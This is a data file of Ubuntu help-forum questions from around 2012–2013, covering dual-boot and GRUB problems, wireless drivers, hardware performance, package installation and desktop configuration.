245539	dualboot install failed ? locked out of windows	you ca n't imagine how happy i am after i finally managed to install ubuntu for the 1st time today . but i still need some help to know how to boot into the other side of my schizophrenic computer , i.e . windows ! the facts : at booting , i access the grub menu , with 2 possible windows 8 bootings ( the system + another recovery drive ) , and both of them are currently dead ends , providing this message : invalid efi file path ... can i fix this ? before the install , i defragged plus shrunk my 500mb disk from pre-installed windows 8 . during ubuntu 12.04 ( daily build ) install , i shrunk again my win disk to 64gb , added a 4 gb swap , a 128 gb media disk ( to be formatted ntfs later ) , and used the rest of free place for my ext 4 ubuntu disk . was it wrong to shrink again my windows disk ? did it damage the access to win 8 ? so you know , my computer is a samsung 532u3c , prior to install bios was set to disabled fast boot , disabled secure mode , and uefi os . i have a recovery cd for windows 8 in my possession , made before the install . thanks for your help . very much .
245542	unbuntu 12.04 and 5ghz throughput	i 'm running an asus g73 laptop with an intel 6200n wireless adapter hooked to a netgear wndr3700 router and netgear cmd31t cable modem . my throughput is all over the place . it will drop to 48 mb/s , jump up to 130 mb/s and on a good day will hit 180 to 270 for a few seconds . it 's always running at 130 or lower though most of the time , enough though i have everything obvious set for 5ghz and not 2.4ghz . naturally , when i go into windows it runs full bore all the time as i do a lot of streaming . is there something i can tweak to get it up to 300 mb/s or do i maybe have a bad component ? i 've only been running ubuntu for a few months , but i am tech-savvy enough to poke around all of the obvious places . i just do n't know enough about the sub-system yet to dig into there ? device information lspci -nnk | grep -iea3 `` ( network|wireless ) '' 03:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6200 [ 8086:422c ] ( rev 35 ) subsystem : intel corporation centrino advanced-n 6200 2x2 agn [ 8086:1301 ] kernel driver in use : iwlwifi kernel modules : iwlwifi kernel uname -r 3.2.0-36-generic firmware packages apt-cache policy linux-firmware\* linux-firmware-nonfree : installed : ( none ) candidate : 1.11ubuntu1 version table : 1.11ubuntu1 0 `` link snipped '' archive.ubuntu.com/ubuntu/ precise-updates/multiverse amd64 packages 1.11 0 `` link snipped '' archive.ubuntu.com/ubuntu/ precise/multiverse amd64 packages linux-firmware : installed : 1.79.1 candidate : 1.79.1 version table : *** 1.79.1 0 `` link snipped '' archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 100 /var/lib/dpkg/status 1.79 0 `` link snipped '' archive.ubuntu.com/ubuntu/ precise/main amd64 packages for the `` link snipped '' markers i had to erase the `` 500 http : // '' part because i do n't have enough reputation yet to post links .
245550	unable to install matlab 2012b in ubuntu 11.10 ( x64 )	i have downloaded matlab 2012b from the mathworks website . when i use ./install in the terminal it gives me the following error : error : can not locate java runtime environment . the directory /home/piyush/desktop/piyush/sys/java/jre/glnx86/jre does not exist , when i looked into the ./sys/java/jre folder there is no glnx86 folder . i have only glnax64 folder which has jre folder . i have also downloaded and updated java in my system , and followed it with system restart . it shall be great if someone could point out what i am doing wrong or suggest method to install matlab properly . thanks !
245552	how does one provide sudo file read access privileges to a wine application ?	in accordance with best practices i desire not to run wine as root , http : //wiki.winehq.org/faq i see plenty of examples for use of setcap for networking , but not so much for file read access . essentially , i 'm trying to give an application the capability to read all files and subdirectories with at least the following privs : -r -- -- -- -- 1 root root i 've tried using built in search , but it fails . a file exists with the particular string i 'm interested in , but i do n't recall its filename or directory located so i intend to use powergrep to locate it , but files owned by root are not readily readable via apps spawned in wine without enhancement by something like setcap .
245554	install itunes on ubuntu	i 've always been an ubuntu lover , but the only thing that holds me back from installing ubuntu on my laptop is itunes . i have an ipad and an ipod touch and managing them without itunes is almost next to impossible , mainly because of ios upgrades . is there any way out ?
245555	workspace is twice the size of my monitor	recently , i have this annoying problem in ubuntu 12.10 with gnome-fallback : my only workspace width has become twice the size of my monitor ( a 19 '' philips ) . because of this , some applications , like gnome user interface , go to to the right part of the workstation and become reachable . i have installed compizeconfig settings manager and set all desktop sizes to '1 ' . but it did not sove the problem . i really appreciate your hints to fix this .
245557	rndc sync failed - could not set file modification time of /etc/bind/slave	i have setup transfer to ips & master/slave directories/files added /etc/bind/rndc.key file with the same pass-phrase on both master/slave permission items inside /etc/bind/slave are -rw-r -- r -- ( also tried -rw-rw-rw without any success ) edited /etc/apparmor.d/usr.sbin.named added /etc/bind/slave/** rw , /etc/bind/master/** rw , /etc/bind/ rw , i then do sudo /etc/init.d/aparmor restart & then run rndc reload test.com ( zone name ) i wait like 5-10 minutes and go to `` vi /var/log/syslog '' & it compares the serial number between the master & slave but then i get these issues : - ns named [ 939 ] : zone test.com/in : refresh : could not set file modification time of '/etc/bind/slave/test.com ' : permission denied + ns named [ 939 ] dumping master file : /etc/bind/slave/tmp-fehwr4afax : open : permission denied using ubuntu server 12.04.1 lts . hopefully someone can help me get this rndc ( sync ) occurring as i am out of ideas at the moment . ( tried modifying folder/file permissions & edited apparmor without any luck ) also since i migrated from a openbsd bind9 to ubuntu bind9 my files structure is a slightly different as i only have a single named configuration file eg . master slave standard named.conf bind.keys rndc.key
245563	does running a minecraft server run with less lag on ubuntu server than on windows 7 ?	i run windows 7 . i run a minecraft server , but i can only host around 9 players before lag appears . i heard that ubuntu can run a server with much better performance than windows 7 . i kind of like the whole idea of ubuntu , but i do n't want to change my os to unix or anything else . basically , my question is , does running a server ( specifically and minecraft server ) run easier and faster on a ubuntu server ? on top of that , how would one set that up ?
245564	how to mention a folder in a network ?	i 'm a returning user to ubuntu , i 've used it several years ago and now i 'm getting back . i use calibre do manage my e-books collection , and i have a desktop running win7 and my notebook running ubuntu . all my library is on my desktop , how can i make my ubuntu 's calibre access my library on my desktop ? note : i can access my library normaly via file explorer . when i had windows on this notebook , i needed only to tell calibre that the way is : \\gustavu-pc\bibliotecado i do n't know what 's the equivalent to this on ubuntu , when i hovered the mouse over the mentioned folder on the file explorer , it gave me a link : smb : //gustavu-pc/bibliotecado/ but when i tried to input this on calibre , it understood it as : /home/g/smb : //gustavu-pc/bibliotecado i do n't know how to tell it that this location is on the network .
245565	every time i turn off or reboot from ubuntu , the boot are lost	that .. every time i turn off or reboot from ubuntu , the boot are lost ... no grub menu , nothing ... just this message : no boot device available sata 0 : installed sata 1 : installed sata 2 : none sata 3 : none more information : ubuntu 12.10 ( with all the updates ) uefi boot without security ( dual boot with windows 8 ) ( my dell xps 8500 had windows 8 eom and therefore uefi boot : ' ( ) only using windows i have no trouble the `` boot-repair '' do n't work ( url : http : //paste.ubuntu.com/1554023/ ) in any livecd , i can see and manage my hd to recover the grub i have done is to use a recovery disk windows without making any kind of handle on the machine , just put my disc , i say start my machine ( `` continue to windows 8 '' ) and went directly to grub but if i happen to get linux sometime i lose the boot somebody can help me ? if you need more information , please tell me thank you
245566	ubuntu 12.10+ optimus nvidia 635m and cuda installation ?	i am trying to install cuda on my ubuntu 12.10 as my computer has optimus graphic card 635m . i was able to use the card by bumblebee till i tried to install cuda . after that i can not run optirun . i tried to install cuda by the installation file from nvidia site also use the software manager as the second try . all my shots are failed . currently i am crazy about the mixure of the card , bumblebee and cuda at 12.10 . is there any one solved that kind of problem at his configuration ?
245572	using atheros速 802.11b/g wireless with ubuntu 12.10 , connecting but not downloading pages	i get a clear signal and the computer shows that it is connected to the network , but the pages do n't load . the message at the bottom of the window reads : `` waiting for www.google.com ... '' -or- whatever page i am trying to get . also , with this wifi device , will i be able to stream live tv ? or should i purchase a newer wifi usb device ?
245575	how to replace primary key in mysql using sed	i need to replace the pattern : \ ( d+ , to ( . how can i do that ? because when i exported db i need to remove the id column which is auto increment . insert into `users` values ( 22 , 'xxx @ gmail.com' ( 22 , should be replace to ( null ,
245579	mounting skydrive as a folder	just finished up installing ubuntu 12.10 . i mainly need a system for school ( grad school ) so theres a few things i would really like to do , especially skydrive . does anyone know how to mount skydrive as a folder ? i know there is a website smestorage.com but i do not wish to go through a third party and even then they have bandwith limits . i will be installing a latex distribution but before i can do that i need access to my 2 gigs of data in skydrive . thanks .
245581	dell inspiron 1520 user completely new to ubuntu	i have been a part of ubuntu user population for about two hours right now . after installing it on my dell inspiron 1520 that i bought so long ago , i jumped in really well , but , i have a few questions : once i check `` main server '' and check 'canonical partners ' option and then the 'broadcom corporation : bcm-4311 802.11a/b/g '' popped under 'additional drivers ' , how long does it take to install ? also , i see geforce 8600m ( proprietary , tested ) , but when i try to install it as well , it gets stuck on the `` applying changes '' portion of what i am thinking is the update phase . this is happening on both , and after 30 minutes , it is still stating , `` applying changes ... '' , so what do i do ? a restart did not resolve this , it sticks about 1/4 inch in on the orange bar every time ... what does a new ubuntu user do ? please advise .
245584	choppy and pixelated video on macbook air 5,1 . unable to run/view hd videos at all	i 'm currently running 13.04 ( i try to extend the little help i can by submitting bug reports ) and the video is extremely choppy and pix-elated on any video program i run ( vlc , mplayer , totem etc . ) , any flash or html5 videos , and hd videos wo n't play in a reasonable way at all ( entire frames get skipped and video footage is completely distorted ; i would say it 's about 10 fps on hd videos , really extremely bad quality ) . also , i had this exact problem on 12.04 and 12.10 and was kind of hoping 13.04 would be better , but it is not . video in mac osx works excellent , no lag or quality loss , works perfect in that os . i would attach some sort of log file or output but i do n't know how and would need directions to do so . specs - macbook air 5,1 ,8 gig ram , 256 ssd , intel® core™ i7-3667u cpu @ 2.00ghz × 4 , intel® ivybridge mobile how can i fix this ? please assist .
245586	after migrating from a wubi install ( 12.10 x64 ) i ca n't mount a usb flash drive	after using the wubi migration script and booting into my ubuntu install , when i plug in my usb flash drive i receive a prompt that says `` unable to open a folder for pendrive . no application is registered as handling this file . '' if i attempt to open the drive from the launcher , nothing happens . any idea why this might be happening ?
245587	recovering files on old os	i recently made a bootable copy of ubuntu on an flash drive to try and recover some files on a fried macbook air before reinstalling the os . when i try to access the the files from macintosh hd it gives me an error message saying i do n't have the proper permissions . is this an in-linux fixable or does osx protect its files from being gotten to out of os .
245588	where are logon and startup scripts for graphical settings located and how are they managed ?	where and how are the ubuntu equivalent of your personal windows configuration stored ? something akin to hkey_current_user\software\microsoft\windows\currentversion\run as well as the start up menu . i have spotted the system -- > preferences -- > startup applications menu entry which seems to do some of it , but it does n't appear to cover most of the things . i am more concerned with those which a pertinent to a graphics login , either directly at the computer or remotely through nx or x2go for instance , as well as those that apply to every user such as this xrandr and those the user might configure personally for instance i have got an xrandr script to set my screen resolution and i also need to configure firefox to allow me to use multiple profiles . currently i do all from the gnome terminal after logging onto the desktop . is there some guide where i can configure all these settings at logon time ? the main thing is the should only apply to logging to ubuntu or gnome destkop , not logging on at the console .
245598	youtube and sound problems	i have two problems with my computer . one is with youtube , one is with sound . i 'm running an i7 computer . for the youtube problem , i ca n't get youtube videos to play at all in firefox . they come up with the loading icon , then firefox freezes , and i have to force close it . i have flash . i 've rebooted . does n't help . the second problem is related to my sound . for some reason , when i first boot up the computer , there is no sound at all . then after a while i ca n't even adjust the sound level bar anymore . finally , twenty minutes later , the audio starts working and i can adjust the bar . what do i do ?
245599	windows 7 does n't show in boot menu after installing grub and ubuntu	i had a system with windows 7 installed on it . for installing ubuntu 12.04 lts , i installed grub . now ubuntu is working fine . but the grub boot menu at system startup does n't show windows 7 , after successful installation of ubuntu . following is the output of sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x71c30ce5 device boot start end blocks id system /dev/sda1 63 80324 40131 12 compaq diagnostics partition 1 does not start on physical sector boundary . /dev/sda2 81920 29044735 14481408 7 hpfs/ntfs/exfat /dev/sda3 * 29044736 522272767 246614016 7 hpfs/ntfs/exfat /dev/sda4 522274814 976764927 227245057 f w95 ext 'd ( lba ) partition 4 does not start on physical sector boundary . /dev/sda5 522274816 651298815 64512000 7 hpfs/ntfs/exfat /dev/sda6 665636864 709464063 21913600 7 hpfs/ntfs/exfat /dev/sda7 808998912 976764927 83883008 7 hpfs/ntfs/exfat /dev/sda8 651300864 665634815 7166976 82 linux swap / solaris /dev/sda9 709466112 808984575 49759232 83 linux partition table entries are not in disk order omitting empty partition ( 6 ) disk /dev/sdb : 32.0 gb , 32017047552 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x71c30ccf device boot start end blocks id system /dev/sdb1 * 2048 16775167 8386560 84 os/2 hidden c : drive /dev/sdb2 16777214 62531583 22877185 5 extended /dev/sdb5 16777216 54396927 18809856 83 linux
245604	ubuntu 12.04 does not boot after installation appears to succeed	after successfully installing ubuntu 12.04 on a sony vaio sve14115fn ( e series ) it 's not booting up . just displaying an error : `` operating system not loaded '' please help me in this .
245606	touchpad recognized but not working	i 'm new to using ubuntu 12.10 64 bit on my laptop . i am not dual booted . my touch pad is not working and this is a big problem for me . please help me solve this problem . when i display the inputs in the terminal this is what i get : ~ $ xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb optical mouse id=11 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ fujitsu fuj02e3 id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ fujitsu fuj02b1 id=9 [ slave keyboard ( 3 ) ] ↳ power button id=10 [ slave keyboard ( 3 ) ] ↳ fj camera id=12 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=13 [ slave keyboard ( 3 ) ]
245610	notes about pdf file in file browser	i have some folders where i have many pdf files , and it is inconvenient for me to open every file and see the contents , while searching for a particular document . is there some way or any file browser , which will open a preview/side pane on the right side when i just select it and the pane should contain the details the pdf file including some notes which i can write to identify the file ?
245611	my macbook pro does not show ubuntu usb while holding alt/option key	i 'm unable to see my newly created 12.04 in the list after holding alt/option when restarting my macbook pro
245612	how to connect to a machine behind a firewall using vnc ?	i am trying to connect to my computer in laboratory from home . i have installed remmina on my laptop home and x11vnc server on the computer in the lab . when i have the laptop in the laboratory i can connect , but when i try it from home i can not . i do not get any diagnostic messages , just `` connection failed '' . i figured out that the problem could be that the laboratory network is behind a firewall that prevents the connection from outside the lan . i have read the documentation on x11vcn and firewalls on : http : //www.karlrunge.com/x11vnc/index.html # firewalls but , i have no experience with computer networks , so i do not understand what is written there . i tried to learn it by googling the terms i do not understand , but each one leads to many more things i do not understand . please could you help me in any way ? if there is no simple answer to my question ( such as run these commands ) , could you at least point me to some useful literature or tutorial ? i may have to build my knowledge from scratch , since i have no understanding of the most basic concepts such as `` port '' , but learning from wikipedia seems very confusing . edit : looking at the comments under how to control an ubuntu pc from another ubuntu pc over internet , using mobile broadband connections ? i realized that the ip adresses given in the system settings and the one given by entering `` ip address '' into google are not the same . i was using the one given by system settings . i will also try the one given by google
245613	how can i create the customize image with hadoop installation for openstack ?	i have used ubuntu builder to make iso image but it works only vmware .the image is not working on openstack . can you please help for make image for openstack with hadoop installation ?
245614	how does my sys admin know that i have n't rebooted my system ?	i got an email from my system administrator saying that i needed to reboot my system to apply some patches . i had forgotten about it and after a couple of hours i got another mail telling me that i was yet to reboot my system . i have since rebooted my system but i 'm surprised how they 'd know if i had rebooted my machine or not . can someone explain how this works ?
245618	after wubi install ubuntu 12.10 stuck up at boot screen	i have windows7 dell inspiron laptop with following configuration windows 7 home premium 64-bit intel core i3 4gb ram first i created a installtion dvd as per the steps and it got successfully burned from iso image of 12.10 64bit . if i try to install ubuntu or selecte try ubuntu it is stuck up at boot screen with no specific error . few forum suggested to change boot parameters but i could n't understand appropriate option for me . secondly i created a usb drive from iso image and used it but same results were optained . finally , i installed ubuntu using the wubi installer . there were n't any errors during the install , and i can select ubuntu from the boot menu . when i select ubuntu , it is stuck up at boot screen and even waiting for a quite long few minutes 5-10 it never recovers and only option is to reboot . i am not sure if this is incompatiblity between ububtu 12.10 64bit with hardware that i have . do i need to try long term support version ? any ideas ?
245620	is it possible to manually define the usable space on my laptop 's trackpad ?	i have an asus ux21a ultrabook . it 's really sweet in most respects . however , there is one issue which to me is a design flaw , though maybe some people think it 's a feature . the tracking area of the touchpad and the mouse buttons overlap . i suppose some people might think this was a feature , as it means that potentially you could drag the pointer to somewhere and then click without having to lift your finger . but for me , it just ends up that sometimes when i go to click something , the pointer moves just a bit so that it moves off the thing i 'm clicking and the click does n't register . especially with the high definition screen , where the pixels are small , which sometimes results in some really tiny interface elements . i 'd like to be able to change the area that responds to finger movement so that it is separate from the buttons . the current effective tracking area is this , outlined in red : i 'd like to change it so that the tracking area is like this , outlined in green : is it possibly to manually configure the touchpad 's responsive area in this way ?
245621	error : unknown filesystem / grub rescue >	my hard drive blew out a couple of months back . i bought a new one today and i downloaded ubuntu 12.10 and put it on a usb . i tried to boot from my flash-drive because it always works . the grub menu does not pop up , ( also my usb had to be formatted which deleted the file of ubuntu i used to have ) and i 'm guessing it 's either a bad version of the os , or dragging it from folder to folder did not move grub with it too , or maybe one of my other drives blew out as well , or something else . i have no clue . if any questions need to be asked , let me know . i also bought a recovery disk that 's supposed to come in within the next week or two . i 'm also trying to partition my hdd to run ubuntu and windows on a dual-boot but i have n't acquired windows yet . but if someone could help me get passed the grub rescue part . also , the only command that works after grub rescue > is ls . nothing else works . and when i type in ls , it gives me like 3 or 4 hd0* stuff .
245623	deleting grub2 which is placed in sda ? and how to fix two ubuntu entry in efi boot selector ?	i have efi windows 8 in my asus k55v laptop . efi partition is sda1 . i tried to install ubuntu in efi mode and created/selected separate boot partition for ubuntu boot loader . ubuntu installed perfectly , but i got 2 boot entries in efi setup . when i tried to delete it in efi setup ( bios screen ) , it restored on restart . so i tried doing boot-repair from live-usb , the thing is it added grub2 to my sda partition . and it did not solve the 2 ubuntu boot entries . so i deleted the ubuntu partitions ( boot/swap/mount ) to remove ubuntu from my laptop . now the problem is that grub2 which is in sda is listed in efi boot selector ( without ubuntu actually installed ) . check this http : //paste.ubuntu.com/1554147/ i need two solutions : how do i remove grub2 from sda partition ? how to install ubuntu without getting 2 boot entries ? should i select the sda1 ( efi partition ) as boot loader partition when installing ubuntu ?
245627	intel hd & ubuntu 12.10 = unknown . tried sna enable & ppa add	i have an asus k52f with and intel hd graphics chip . i used the sna enable trick on 12.04 and it worked without the ppa needing to be added . i 've been going at it for 3 days now on 12.10 and tried everything i can think of or find online but it still shows up as unknown graphics under settings -- > details . does anyone know anything that can fix this . the i915 kernel driver is loading if this makes a difference i do n't now .
245628	repair windows 8 after install ubuntu using install alongside windows 8	i installed ubuntu 12.04.1 on my laptop . i knew that installing using the option install alongside windows 8 will screwup windows 's bootloader . but i ended up installing it in that way because i was not paying any attention . so now i have a grub , a working ubuntu and a broken windows 8 . i dont have a windows 8 installation disk as it came preinstalled . is there a way to repair windows bootloader ? a broken windows in the sense when i try to boot windows it gives me a screen saying '' windows failed to start '' and `` boot configuration data missing '' and asks me to insert windows installation disk . but i dont have one .
245630	does ubuntu support the venix 80286 file-system ?	i need to know , if ubuntu supports the venix 80286 file-system . the hdd is fine , but i need to read , the file-system , and to copy some files of it ! i could n't find anything useful on google , and askubuntu . question : does ubuntu support the venix 80286 file-system ?
245634	after trying ubuntu from a partitioned drive , ubuntu keeps booting , instead of windows	i 've already partitioned my hard drive and i installed linux live usb creator on this partioned drive , which would serve as my linux usb and of course , it went well . restarting windows , ubuntu came up alright but i did n't installed it , i only used the `` try ubuntu '' for a while . shutting down and restarting the computer , windows is not loading up any longer but ubuntu . i 've also tried my `` boot menu '' which does n't show linux or windows just one hard drive . can anyone help ? i guess , the boot loader is making ubuntu boot first , instead of showing options .
245649	will ubuntu work fine on my asus eee netbook ?	i 've got a asus eee pc 1015bx-whi135s : amd c-50 ; dual core ; 1000 mhz 320 gb ; sata ; 5400 rpm lcd-led ; 1024 x 600 ; 10,1 inches will the default ubuntu 12.10 distro work fine on this machine ? or is it better to choose another distro ( lubuntu or xubuntu ) ? or maybe unity 2d instead of 3d ? it runs windows 7 starter fine , but its slow with windows 8 ...
245650	ubuntu does n't boot , vesafb missing	when i try to boot ubuntu 11.04 i get this result : fatal : error inserting vesafb ( /lib/modules/3.0.0-12-generic/initrd/vesafb.ko ) : no such device it stucks here . i can see it when i press ctrl alt f1 . in the f7 screen it stucks in the 5 dots . i want to recover my system or at least i want to copy my very important files that exist in there . i am sure i had chosen to enqrypt my files . and i think it happened when i tryied to install oneiric version . please help ! ! !
245651	how do i resolve debian packaging issue with $ { python : depends } ?	i am trying to build a python-based debian package and i see the $ { python : depends } variable under the depends section in the control file . while installing , i see that it refers to the python-alembic package as a dependency , but i can not understand how or where this variable gets populated . basically , i wanted to change the name here from python-alembic to alembic under the depends section coz i do n't have the package with name python-alembic .
245652	ca n't delete facebook and google in online accounts ! where is the config file for ubuntu online accounts located ?	since today i have an issue with my ubuntu online account settings . i started empathy to log into my messengers , but i got an error that facebook , google and msn need an authentication . i tried to delete all of them , but only msn i was able to delete . facebook and google account do nothing . doesnt matter account is on/off . is there a way by delete a config file and reset ubuntu online accounts in this way ?
245653	what happens to manual upstart services on shut down ?	if using the manual keyword in an init or override upstart script , it is not clear whether the services shut down process will be initiated or it will just be killed on shut down . for instance , will mysqls default timeout be extended ( giving it enough time to flush buffers , as specified in the init script ) when the manual override is used ? if not , would it be preferable to use a start on never setting , or do manually started services need to also be manually shut down ? the upstart cookbook has little to say on the matter .
245661	connect to android phone to send and receive sms	as said in the title , is there a solution for this ? before my actual android phone , i had a nokia and for it there were some applications in the repo for this aim ( series60-remote , xgnokii , wammu ) . * addition * clearly , i want to connect my phone to ubuntu-box ( via usb , bluetooth ... ) and from here receive and send sms
245668	coloring the terminal prompt text issue	i 've learned a neat trick in school to make your terminal prompt text look more pretty , eg . export ps1= '' ( \h ) \u \w `` gives me ( brendt-ubuntu ) brendt ~ the issue happens when i try to color these things , some weird text overflow bug appears : this is without colors this is with colors ( export ps1= '' \e [ 1 ; 34m ( \h ) \e [ m \u \e [ 1 ; 34m\w \e [ m '' ) are there any fixes for this ?
245670	wo n't boot , blinking cursor after power-outage	i dual-booted my mac with ubuntu and it was running fine , i we n't out the office but continued to use it via vnc just to set up my environment , this obviously caused a lot of updates that wanted me to restart my computer ( something i could n't do as it would boot straight into mac unless someone selected linux on refit ) . then there was a power outage causing it to be shut-off one day , i came back into the office today to find that it refuses to boot , i just get a black screen with a flashing white cursor , it does boot into the mac no problem , any solutions ? edit mac partition inspector : * report for internal hard disk * current gpt partition table : # start lba end lba type 1 40 409639 efi system ( fat ) 2 409640 212872855 mac os x hfs+ 3 212873216 1894903807 basic data 4 1894903808 1953262983 linux swap current mbr partition table : # a start lba end lba type 1 1 409639 ee efi protective 2 409640 212872855 af mac os x hfs+ 3 * 212873216 1894903807 83 linux 4 1894903808 1953262983 82 linux swap / solaris mbr contents : boot code : grub partition at lba 40 : boot code : none ( non-system disk message ) file system : fat32 listed in gpt as partition 1 , type efi system ( fat ) partition at lba 409640 : boot code : grub file system : hfs extended ( hfs+ ) listed in gpt as partition 2 , type mac os x hfs+ listed in mbr as partition 2 , type af mac os x hfs+ partition at lba 212873216 : boot code : grub file system : ext4 listed in gpt as partition 3 , type basic data listed in mbr as partition 3 , type 83 linux , active partition at lba 1894903808 : boot code : none file system : unknown listed in gpt as partition 4 , type linux swap listed in mbr as partition 4 , type 82 linux swap / solaris edit edit : it seems to not even get into the grub loader , as pressing shift does nothing , i select linux from refit then it goes straight to a black screen with a flashing text input cursor , i can do nothing , only restart and do it all again .
245674	will these delete my files ? ( fixpart )	i 'm applying a fixpart command so ubuntu amd64 install will detect windows installation and install alongside it . i applied this command , i have n't chose yet , if i chose y will it delete everything on my disk ? sudo fixparts /dev/sda fixparts 0.8.4 loading mbr data from /dev/sda notice : gpt signatures detected on the disk , but no 0xee protective partition ! the gpt signatures are probably left over from a previous partition table . do you want to delete them ( if you answer 'y ' , this will happen immediately ) ? ( y/n ) :
245684	why is my intel ssd 520 so slow ?	i 'm running a fresh installed ubuntu 12.04 lts with ext4 on a ssd 520 by intel . my mainboard is an asus crosshair ( latest bios 1207 ) with a sil 3132 sata controller which claims to support sataii . i have trim enabled . but my results are pretty bad in comparison to what could be expected : sudo hdparm -tt /dev/sda /dev/sda : timing cached reads : 2510 mb in 2.00 seconds = 1255.51 mb/sec timing buffered disk reads : 376 mb in 3.00 seconds = 125.21 mb/sec is my mainboard bottlenecking it ? here are some info about the ssd in use : sudo hdparm -i /dev/sda /dev/sda : ata device , with non-removable media model number : intel ssdsc2cw120a3 serial number : cvcv227301je120bgn firmware revision : 400i transport : serial , ata8-ast , sata 1.0a , sata ii extensions , sata rev 2.5 , sata rev 2.6 , sata rev 3.0 standards : used : unknown ( minor revision code 0x0110 ) supported : 9 8 7 6 5 likely used : 9 configuration : logical max current cylinders 16383 16383 heads 16 16 sectors/track 63 63 -- chs current addressable sectors : 16514064 lba user addressable sectors : 234441648 lba48 user addressable sectors : 234441648 logical sector size : 512 bytes physical sector size : 512 bytes logical sector-0 offset : 0 bytes device size with m = 1024*1024 : 114473 mbytes device size with m = 1000*1000 : 120034 mbytes ( 120 gb ) cache/buffer size = unknown nominal media rotation rate : solid state device capabilities : lba , iordy ( can be disabled ) queue depth : 32 standby timer values : spec 'd by standard , no device specific minimum r/w multiple sector transfer : max = 16 current = 1 advanced power management level : 254 dma : mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 udma5 *udma6 cycle time : min=120ns recommended=120ns pio : pio0 pio1 pio2 pio3 pio4 cycle time : no flow control=120ns iordy flow control=120ns commands/features : enabled supported : * smart feature set security mode feature set * power management feature set * write cache look-ahead * host protected area feature set * write_buffer command * read_buffer command * nop cmd * download_microcode * advanced power management feature set power-up in standby feature set * set_features required to spinup after power up * 48-bit address feature set * mandatory flush_cache * flush_cache_ext * smart error logging * smart self-test * general purpose logging feature set * write_ { dma|multiple } _fua_ext * 64-bit world wide name * idle_immediate with unload * write_uncorrectable_ext command * { read , write } _dma_ext_gpl commands * segmented download_microcode * gen1 signaling speed ( 1.5gb/s ) * gen2 signaling speed ( 3.0gb/s ) * native command queueing ( ncq ) * host-initiated interface power management * phy event counters * unknown 76 [ 14 ] dma setup auto-activate optimization device-initiated interface power management * software settings preservation * smart command transport ( sct ) feature set * sct data tables ( ac5 ) * data set management trim supported ( limit 1 block ) * deterministic read data after trim security : master password revision code = 65534 supported not enabled not locked not frozen not expired : security count supported : enhanced erase 4min for security erase unit . 2min for enhanced security erase unit . logical unit wwn device identifier : 5001517bb29a74d4 naa : 5 ieee oui : 001517 unique id : bb29a74d4 checksum : correct
245687	measure fps of the game	i 'd like to find an analogue of fraps or any other fps counter on ubuntu 12.10 . after some googling i found 2 solutions : to use mumble ( i found it from this discussion ) . this solution did n't work for me because after launching the game : mumble-overlay game i got this error : game : symbol lookup error : /usr/lib/mumble/libmumble.so.1 : undefined symbol : glpopclientattrib and i did n't find any fix of this error in the web . to use winedebug=fps with osd_cat . it works only with wine ( only windows games ) . found from reading this discussion and this article . it shows fps during play but the output is definitely wrong - 0.15-0.18 fps . and it does n't matter if game really runs slow or fast - the result is always the same . does anyone know how to fix these errors ? or are there any other solutions ? thanks for the help .
245688	how to use atheros ath5k driver with aircrack-ng ?	i have read pages and pages of wiki and i 'm just more confused than ever as to driver and patches to use with the aircrack-ng suite . the card chipset is ath5k but the info is conflicting as to which is the best to use . cat /proc/version linux version 3.5.0-22-generic ( buildd @ lamiak ) ( gcc version 4.7.2 ( ubuntu/linaro 4.7.2-2ubuntu1 ) ) # 33-ubuntu smp wed jan 2 21:45:40 utc 2013 lsmod | grep ath5k ath5k 135206 0 ath 19188 1 ath5k mac80211 461203 1 ath5k cfg80211 175574 3 ath5k , ath , mac80211 lsmod | grep mac80211 mac80211 461203 1 ath5k cfg80211 175574 3 ath5k , ath , mac80211 so do i use ath5k or mac80211 and then do i have to blacklist all the others ? or am i good to go as i followed the instructions to get to this point but it just seems really confusing and conflicting .
245690	ca n't open libreoffice	i ca n't open libreoffice anymore , neither writer nor calc . if i try it from the launcher , the icons flash a few times and then stop . the libreoffice start window emerges for about one second and then disappears . if i open nautilus and click on any document assigned to libreoffice , the libreoffice start window emerges for about one second and then disappears . when trying it from the terminal with libreoffice -- writer , for example , i see the same behavior and the following error message : [ java framework ] error in function createsettingsdocument ( elements.cxx ) . javaldx failed ! warning : failed to read path from javaldx terminate called after throwing an instance of 'com : :sun : :star : :uno : :runtimeexception' what can i do ?
245695	how do you insert subscripts and superscripts into ordinary ( non-formula ) text in libreoffice writer ?	i know that libreoffice writer can facilitate subscripts and superscripts in ordinary , non-formula , textâwhen i copy and paste such things from microsoft office word 2007 documents libreoffice writer manages to accommodate them . my libreoffice writer version is 3.6.4 . i have n't managed to find any better place to ask this question , if there is please direct me to it . i am running 12.10 if it is relevant .
245701	how can i make my screenlets run on startup ?	i 've installed screenlets and it seems to work fine . however , when i boot my computer i have to manually initiate every widget . i would like my widgets to initiate without me having to do anything , if possible . screenlet deamon is already on startup applications .
